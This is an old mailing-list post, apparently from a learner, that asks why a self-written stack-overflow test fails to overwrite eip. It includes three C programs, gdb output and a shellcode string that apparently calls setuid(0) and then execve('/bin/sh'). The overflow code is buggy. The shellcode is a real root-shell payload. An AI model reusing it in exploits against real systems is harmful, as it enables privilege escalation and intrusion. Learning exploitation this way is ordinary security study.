Hi, Im playing with this lazy code,and I got surprised because debugging
I see some strange behavours:
#include <stdio.h>
main (){
char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
for (i=0;i<8+16;i+=4)
foo[i]=&shellcode;
}
With this simply code we I want overwrite ebp & eip.
ebp addr should be foo+8 and eip addr foo+12.
Compile with -g option and fire up gdb.
lobillo_at_Sion:~$ gcc -g -o prueba1 prueba1.c
prueba1.c: In function 'main':
prueba1.c:16: warning: assignment makes integer from pointer without a cast
lobillo_at_Sion:~$ gdb -q prueba1
(gdb) r
Starting program: /home/lobillo/prueba1
Program received signal SIGILL, Illegal instruction.
0x400361cf in __libc_start_main () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffacc 0xbffffacc
eip 0x400361cf 0x400361cf
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
mmmmmm first thing we take look around and see that ebp and eip contents
differents addresses.
why? I think overwrited was theorical implemented but notice that gdb doesnt
think the same xD.
< foo >< ebp >< eip >
8 8 8
| | |
|------|------|------> &shellcode
Well,lets see by eip was overwrited,buy ebp was sucessfully overwrited? lets
modify the code:
#include <stdio.h>
main (){
char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
for (i=0;i<8+16;i+=4)
foo[i]=0xbffffabc;
}
lobillo_at_Sion:~$ gcc -g -o prueba2 prueba2.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo_at_Sion:~$ gdb -q prueba2
(gdb) r
Starting program: /home/lobillo/prueba2
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffabc 0xbffffabc
eip 0x40034370 0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
Yep,ebp overwrited but what about eip? lets investigate...
#include <stdio.h>
main (){
char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
for (i=8;i<16;i+=4)
foo[i]=0xbffffabc;
}
Looking the code,we notice that the -for- will overwrite only eip,by jumping
ebp.Lets see what gdb thinks...
lobillo_at_Sion:~$ gcc -g -o prueba3 prueba3.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo_at_Sion:~$ gdb -q prueba3
(gdb) r
Starting program: /home/lobillo/prueba3
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffabc 0xbffffabc
eip 0x40034370 0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
!!!!! ebp is 0xbffffabc? eps,guys this is because i wrote all this shit.
I dont understand why eip is not being overwrited and ebp is so strange :P
Im coding under Debian Woody 3.0,and i notice that Debians have severals
differences debugging than others
distros,its true?
Thanks and sorry for my pour english :P
Received on Mar 10 2004
Intro
